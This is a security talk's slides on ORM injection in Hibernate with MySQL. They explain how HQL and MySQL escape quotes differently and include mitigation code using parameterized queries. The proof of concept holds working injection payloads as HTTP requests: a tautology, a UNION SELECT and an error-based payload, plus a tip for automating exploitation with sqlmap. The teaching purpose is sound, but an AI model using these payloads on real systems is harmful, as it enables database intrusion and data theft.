ORM Injection
Donato Onofri
Simone Onofri
September 03, 2016
Agenda
- Injection
- ORM
- ORM Injection
- ORM Injection in Hibernate with mySql
- Proof of Concept
- Conclusions
Injection Vulnerabilities
Injection
The first vulnerability of OWASP TOP 10 2013
https://www.owasp.org/index.php/Top_10_2013-A1-Injection
Injection Definition
"Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP headers, program arguments, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws."
Exploitability - EASY
Prevalence - COMMON
Detectability - AVERAGE
Impact - SEVERE
How do I prevent?
Keep untrusted data separate from commands and queries: a) use a safe API (parameterized queries; be careful with stored procedures, which can still concatenate SQL internally); b) escape special characters for the target interpreter (e.g. with ESAPI); c) apply positive (whitelist) input validation.
Object Relational Mapping
Object Relational Mapping
What is ORM?
Object-Relational Mapping (ORM) is a programming technique that manages data persistence and integrates relational databases with software architectures based on the object-oriented paradigm.
PROS – open source, "Domain Model" pattern, faster development and less code, portability, performance, concurrency and multi-tenancy, scalability, extensibility, etc.
EXAMPLES – Hibernate (Java); Propel (PHP); NHibernate (.NET)
[Diagram: Web Server / Application Server hosting the Domain Model Objects and the ORM layer, talking to the Database Server]
Object Relational Mapping
A hibernation story: the ORM for Java
2001: Started by Gavin King (Cirrus Technologies) as an alternative to using EJB2
2003: Hibernate2 released with significant improvements
2005: Hibernate3 released with key features; developers hired by JBoss
2011: Hibernate4 released with multi-tenancy, SessionFactory…
2015: Hibernate5 released with improved bootstrapping, Java 8…
Between Java and persistence:
- mapping from Java classes to database tables
- CRUD operations
- declarative model («automation by annotation»)
- custom batching
- usable with the Hibernate Query Language (HQL)
Object Relational Mapping
What is Hibernate?
https://docs.jboss.org/hibernate/orm/5.1/userguide/html_single/Hibernate_User_Guide.html
"Hibernate's design goal is to relieve the developer from 95% of common data persistence-related programming tasks by eliminating the need for manual, hand-crafted data processing using SQL and JDBC. However, unlike many other persistence solutions, Hibernate does not hide the power of SQL from you and guarantees that your investment in relational technology and knowledge is as valid as always."
Hibernate uses a powerful query language (HQL) that is similar in appearance to SQL, but fully object-oriented. HQL queries are translated by Hibernate into conventional SQL queries, which in turn perform the action on the database.
[Diagram: user input (http://example.com/search?place=dagobah) enters at the Presentation Layer, passes through the Business Logic Layer to the Data Access Layer (Java Persistence API / Hibernate Native API), where Hibernate builds an HQL query searching for "dagobah", translates it into a SQL query searching for "dagobah" and sends it over JDBC to the Database]
ORM 101: Object Relational Mapping
Hibernate Query Language Cheatsheet
Syntax
• With the exception of names of Java classes and properties, queries are case-insensitive.
• Clauses: SELECT, UPDATE, DELETE, INSERT, WHERE, JOIN, ORDER BY, GROUP BY, AS
• Aggregate functions: COUNT, AVG, MIN, MAX, SUM
• Expressions: CASE {operand} WHEN {test_value} THEN {match_result} ELSE {miss_result} END
• Polymorphic queries
NOTE: HQL is fairly limited compared with the native SQL dialects of relational database management systems.
ORM 101: Object Relational Mapping
Hibernate Query Language Cheatsheet
Data Types
• Numeric
• Boolean
• DateTime
• Strings
  • Enclosed in single quotes. To escape a single quote (') within a string literal, use two single quotes ('').
  • E.g.:
// Escaping quotes – search for "Joe's"
List<Person> persons =
    entityManager.createQuery(
        "select p " +
        "from Person p " +
        "where p.name like 'Joe''s'", Person.class)
    .getResultList();
// Not escaping quotes – search for "Joe"
List<Person> persons =
    entityManager.createQuery(
        "select p " +
        "from Person p " +
        "where p.name like 'Joe'", Person.class)
    .getResultList();
ORM Injection
ORM Injection
By official definition from CAPEC-109: ORM Injection
http://capec.mitre.org/data/definitions/109.html
Definition
"An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible."
How do I prevent?
• Understand how to use the data access methods generated by the ORM tool / framework properly, in a way that leverages the built-in security mechanisms of the framework.
• Keep up to date with security-relevant updates to the persistence framework used within your application.
Attack Prerequisites
• An application uses a data access layer generated by an ORM tool or framework
• An application uses user-supplied data in queries executed against the database
• The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework
ORM Injection
What is possible to do?
– As stated in the injection definition, we have to modify the «meaning» of the original request (query) to the interpreter in order to receive arbitrary data.
– With an ORM we have two interpreters:
  – the ORM itself (in our case Hibernate)
  – the SQL database (in our case MySQL)
– What to inject:
  – ORM: fewer possibilities, because of the limited functionality of HQL
  – SQL: more possibilities, because of the power of the database used by the ORM
[Diagram: user input enters at the Presentation Layer, passes through the Business Logic Layer to the Data Access Layer (Java Persistence API / Hibernate Native API), then Hibernate, then JDBC, then the Database: two interpreters on the same path]
ORM Injection in Hibernate
Over ORM/HQL Injection
Breaking the syntax
• Recall:
  • Hibernate can use HQL as a layer over SQL
  • Hibernate escapes the char ' with ''
  • Relational databases may (rather: very often) use different escaping rules
  • E.g. MySQL also escapes the char ' with \'
• Cons:
  • Chars (or strings) with a specific semantic in HQL syntax can have a different semantic in SQL: \ is a simple char in HQL!
Let's generalize
http://2015.zeronights.org/assets/files/36-Egorov-Soldatov.pdf
– MySQL
  – Hibernate: 'abc\'' or 1=(select 1)-- ' [thinks it is one string literal: \ is an ordinary char and '' is an escaped quote]
  – MySQL: 'abc\'' or 1=(select 1)-- ' [\' is an escaped quote, the next ' closes the string abc', then or 1=(select 1) runs as SQL and -- comments out the trailing quote]
– PostgreSQL
  – \' not working: quote escaping with '' only
  – HQL allows subqueries in the WHERE clause
  – Hibernate allows arbitrary function names in HQL
  – PostgreSQL has query_to_xml('SQL')
– Oracle
  – \' not working: quote escaping with '' only
  – Hibernate allows arbitrary function names in HQL
  – Oracle has the nice built-in DBMS_XMLGEN.getxml('SQL')
– MSSQL
  – \' not working: quote escaping with '' only
  – No usable XML function
  – Hibernate ORM allows Unicode symbols
  – MS SQL Server allows Unicode delimiters in a query
  – Use UTF-8 delimiters such as U+00A0
Back to the Hibernate and mySql
From input to Database
User Input
http://www.example.com/app/?person=Yoda
HQL Query
SELECT p FROM Person p WHERE p.name LIKE '%Yoda%'
(My)SQL Query
SELECT person0_.id as id1_,
       person0_.name as name1_,
       person0_.age as age1_
FROM app1.person person0_
WHERE person0_.name LIKE '%Yoda%'
Over ORM/HQL Injection
A question of escaping
HQL Query
SELECT p FROM Person p WHERE p.name LIKE '%Yoda\'' UNION SELECT version(),1,1-- %'
The sequence \'' is read in two different ways:
– HQL sees \ as an ordinary char and the following '' as one escaped quote, so the whole thing is still a single string literal.
– MySQL sees \' as an escaped quote and the next ' as the end of the string, so everything after it is parsed as SQL.
Over ORM/HQL Injection
SQL Injection via HQL Injection
User Input (note the space after --, which MySQL requires for a comment)
http://www.example.com/app/?person=Yoda\'' UNION SELECT version(),1,1-- 
HQL Query (one string literal, as far as Hibernate is concerned)
SELECT p FROM Person p WHERE p.name LIKE '%Yoda\'' UNION SELECT version(),1,1-- %'
(My)SQL Query (the literal ends after Yoda\', the UNION is executed, and -- comments out the trailing %')
SELECT person0_.id as id1_,
       person0_.name as name1_,
       person0_.age as age1_
FROM app1.person person0_
WHERE person0_.name LIKE '%Yoda\'' UNION SELECT version(),1,1-- %'
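The two-lexer mismatch above (from "Breaking the syntax" through "SQL Injection via HQL Injection"), as an added example that is not code from the original slides: a plain-Java model of how Hibernate's HQL lexer (only the '' escape, backslash is an ordinary character, as in the Hibernate 4/5 versions the slides discuss) and MySQL's lexer (default sql_mode, where \' is also an escape) each read the same quoted literal. The LIKE '%…%' wrapping mirrors the slides' search; the sample inputs are constructed. The class name, methods and inputs are the example's own assumptions.

```java
// Added example, not code from the original slides: a plain-Java model of the two
// lexers. HQL (Hibernate 4/5 as discussed in the slides) knows only the '' escape
// and treats a backslash as an ordinary character; MySQL (default sql_mode, without
// NO_BACKSLASH_ESCAPES) additionally treats \' as an escaped quote. The LIKE '%...%'
// wrapping mirrors the slides' search; the sample inputs are constructed.
public class QuoteMismatch {

    /** How one interpreter read a quoted literal. */
    public static final class Lexed {
        public final String value;     // decoded content of the literal
        public final String trailing;  // text after the closing quote, parsed as syntax
        public final boolean closed;   // false: no closing quote found (unterminated)

        Lexed(String value, String trailing, boolean closed) {
            this.value = value;
            this.trailing = trailing;
            this.closed = closed;
        }
    }

    /** Lex a string literal whose opening quote is at index 0. */
    public static Lexed lex(String quoted, boolean backslashEscapes) {
        if (quoted.isEmpty() || quoted.charAt(0) != '\'') {
            throw new IllegalArgumentException("literal must start with a single quote");
        }
        StringBuilder value = new StringBuilder();
        int i = 1;
        while (i < quoted.length()) {
            char c = quoted.charAt(i);
            if (backslashEscapes && c == '\\' && i + 1 < quoted.length()) {
                value.append(quoted.charAt(i + 1));       // MySQL only: \x stands for x
                i += 2;
            } else if (c == '\'') {
                if (i + 1 < quoted.length() && quoted.charAt(i + 1) == '\'') {
                    value.append('\'');                   // both: '' stands for '
                    i += 2;
                } else {
                    return new Lexed(value.toString(), quoted.substring(i + 1), true);
                }
            } else {
                value.append(c);
                i++;
            }
        }
        return new Lexed(value.toString(), "", false);
    }

    public static Lexed lexHql(String quoted)   { return lex(quoted, false); }
    public static Lexed lexMySql(String quoted) { return lex(quoted, true); }

    /** Wrap a request parameter the way the vulnerable search concatenates it. */
    public static String wrapLike(String userInput) {
        return "'%" + userInput + "%'";
    }

    public static void main(String[] args) {
        String[] inputs = {
            "dagobah",                                    // benign
            "dagobah'",                                   // HQL closes early, %' left over -> QueryException
            "dagobah''",                                  // valid for both: value %dagobah'%
            "dagobah\\''",                                // HQL ok; MySQL closes early -> SQLGrammarException
            "dagobah\\'' UNION SELECT version(),1,1-- ",  // HQL ok; MySQL executes the UNION
        };
        for (String in : inputs) {
            Lexed h = lexHql(wrapLike(in));
            Lexed m = lexMySql(wrapLike(in));
            System.out.println("input  : " + in);
            System.out.println("  HQL  : closed=" + h.closed + " value=[" + h.value + "] trailing=[" + h.trailing + "]");
            System.out.println("  MySQL: closed=" + m.closed + " value=[" + m.value + "] trailing=[" + m.trailing + "]");
        }
    }
}
```

Run it with `java QuoteMismatch.java` (JDK 11 or later). For the last input, HQL reports a single closed literal with nothing trailing, while MySQL reports the literal `%dagobah'` followed by ` UNION SELECT version(),1,1-- %'` as trailing syntax: that trailing text is exactly the SQL that ends up executing in the PoC.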
Proof of Concept
ORM Injection with Hibernate and MySQL
Proof of Concept
Requirements
• Hibernate
• HQL query
• MySQL database
• Unsafe application
Proof of Concept
Let’s start
HTTP Request
GET /app/planets/search?place=dagobah&page=1 HTTP/1.1
HTTP Response
200 OK (JSON)
{
  "places": [
    {"name1": "hello1", "place": "dagobah", "placeCode": "123", "CF": "243436"},
    {"name2": "hello2", "place": "dagobah", "placeCode": "1234", "CF": "243465"},
    {"name3": "hello3", "place": "dagobah", "placeCode": "12345", "CF": "265434"}
  ]
}
«All you need is love…»
The Beatles on injection vulnerabilities
Proof of Concept
Breaking HQL Query
HTTP Request
GET /app/planets/search?place=dagobah'&page=1 HTTP/1.1
HTTP Response
500 Internal Server Error (Hibernate QueryException)
The unbalanced quote breaks the HQL string literal, so Hibernate rejects the query before anything reaches MySQL.
Proof of Concept
Not Breaking HQL – Correct escape in HQL
HTTP Request
GET /app/planets/search?place=dagobah''&page=1 HTTP/1.1
HTTP Response
200 OK (JSON)
{
  "places": [
    {"name1": "hello1", "place": "dagobah", "placeCode": "139439439349", "destroyed": "no"},
    {"name2": "hello2", "place": "dagobah's", "placeCode": "139439439349", "destroyed": "no"}
  ]
}
'' is a valid escape for both HQL and MySQL, so the query is accepted by both interpreters and runs for the value dagobah'.
Proof of Concept
Injecting HQL in order to «select all» (take care: it is dangerous)
HTTP Request
GET /app/planets/search?place=dagobah' or '1' = '1&page=1 HTTP/1.1
HTTP Response
200 OK (JSON)
{
  "places": [
    {"name1": "hello1", "place": "dagobah", "placeCode": "139439439349", "destroyed": "no"},
    {"name2": "hello2", "place": "tatooine", "placeCode": "139439439347", "destroyed": "no"},
    {"name3": "hello3", "place": "alderaan", "placeCode": "139439439360", "destroyed": "yes"},
    {"name4": "hello4", "place": null, "placeCode": null, "destroyed": null},
    {"name5": "hello5", "place": "hot", "placeCode": "73439439360", "destroyed": "no"}
  ]
}
This is pure HQL injection: ' or '1' = '1 is valid HQL, so the WHERE clause becomes always true and every planet is returned, without touching MySQL's escaping rules at all.
Proof of Concept
Breaking SQL Query
HTTP Request
GET /app/planets/search?place=dagobah\''&page=1 HTTP/1.1
Different from the previous one!
SQLGrammarException != Hibernate QueryException
HTTP Response
500 Internal Server Error (SQLGrammarException)
HQL accepts the literal (\ is an ordinary char, '' an escaped quote), but MySQL reads \' as the escaped quote and the next ' as the end of the string, leaving the rest of the query syntactically broken: the error now comes from the database, not from Hibernate.
Proof of Concept
Breaking SQL Query (cont'd)
HTTP Request
GET /app/planets/search?place=dagobah\''&page=1 HTTP/1.1
HTTP Response
500 Internal Server Error (MySQLSyntaxErrorException)
Proof of Concept
Bad Request – SQL Injection over HQL Injection (using valid SQL)
HTTP Request
GET /app/planets/search?place=dagobah\'' AND (SELECT 8164 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT (ELT(8164=8164,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- wNyk&page=1 HTTP/1.1
HTTP Response
500 Internal Server Error (MySQLIntegrityConstraintViolationException)
The query is now valid SQL for MySQL: this classic error-based payload forces a duplicate GROUP BY key, and the resulting "Duplicate entry" error surfaces as an integrity constraint violation, which confirms that the injected SQL was executed by the database.
Over ORM/HQL Injection
Automate Injection on Hibernate/mySql
Automation is fun: to exploit «automagically» the MySQL database behind the ORM, use sqlmap's --prefix switch with a value that is a correct HQL string literal but a broken MySQL one, e.g. dagobah\''
Conclusions
Conclusion
Lesson learned
Impact
Depends on the DBMS under the ORM level (e.g. the escape char «\» has a different meaning in PostgreSQL; see http://2015.zeronights.org/assets/files/36-Egorov-Soldatov.pdf for further details)
Mitigation
Enforce boundary controls at each application layer (strict input validation, parameterized queries)
Future
Think strategically! OGM injection? (see http://hibernate.org/ogm/ for further details)
«Never trust the user input, frameworks too...»
Parameter manipulation motto (reloaded)
Over ORM/HQL Injection
Wikipedia suggestions on SQL Injection mitigation
Wikipedia on parameterized statements
Mitigation
"With most development platforms, parameterized statements that work with parameters can be used (sometimes called placeholders or bind variables) instead of embedding user input in the statement. A placeholder can only store a value of the given type and not an arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value."
https://en.wikipedia.org/wiki/SQL_injection#Parameterized_statements
Enforcement at the coding level
"Using object-relational mapping libraries avoids the need to write SQL code. The ORM library in effect will generate parameterized SQL statements from object-oriented code."
Is it true?
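Only if you actually give the ORM a parameter. As an added example (not code from the slides or from the Hibernate project), here is the planet search written the way the PoC implies it was written, with the request parameter concatenated into the HQL text, beside the form that really does produce the parameterized statement Wikipedia promises. The Planet entity and its fields, the method names and the use of the javax.persistence (JPA 2.1) API as implemented by Hibernate 5 are this example's assumptions.

```java
// Added example, not code from the original slides or from the Hibernate project.
// Assumptions: a Planet entity mapped to the table behind /app/planets/search,
// the javax.persistence (JPA 2.1) API as implemented by Hibernate 5, and a
// caller that already owns an EntityManager.
import java.util.List;
import javax.persistence.Entity;
import javax.persistence.EntityManager;
import javax.persistence.Id;
import javax.persistence.TypedQuery;

public class PlanetSearch {

    @Entity
    public static class Planet {
        @Id
        public Long id;
        public String name;
        public String place;
        public String placeCode;
    }

    // VULNERABLE: the request parameter is spliced into the HQL text. Hibernate
    // lexes it once (hence the QueryException for dagobah') and MySQL lexes the
    // generated SQL again (hence the SQLGrammarException for dagobah\'').
    public static List<Planet> searchUnsafe(EntityManager em, String place) {
        String hql = "SELECT p FROM Planet p WHERE p.place LIKE '%" + place + "%'";
        return em.createQuery(hql, Planet.class).getResultList();
    }

    // SAFE: a named parameter is sent as a JDBC bind value, never as query text,
    // so neither interpreter ever sees the user's quotes or backslashes. The ORM
    // only generates a parameterized statement when you give it a parameter.
    public static List<Planet> searchSafe(EntityManager em, String place) {
        TypedQuery<Planet> q = em.createQuery(
                "SELECT p FROM Planet p WHERE p.place LIKE :pattern ESCAPE '!'",
                Planet.class);
        q.setParameter("pattern", "%" + escapeLike(place) + "%");
        return q.getResultList();
    }

    // Binding stops injection but not LIKE wildcard abuse (a bare % would match
    // every row), so neutralise %, _ and the chosen escape char inside the value.
    static String escapeLike(String s) {
        return s.replace("!", "!!").replace("%", "!%").replace("_", "!_");
    }
}
```

With searchSafe, every input from the PoC (dagobah', dagobah'', dagobah\'' and the UNION payload) is just a search string that matches nothing; the two-interpreter problem disappears because the value never becomes part of either the HQL or the SQL text. The ESCAPE clause is a search-semantics fix, not an injection fix: it only stops a user from turning the LIKE into a "select all".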
Conclusions
A «Toy» Story
Thank you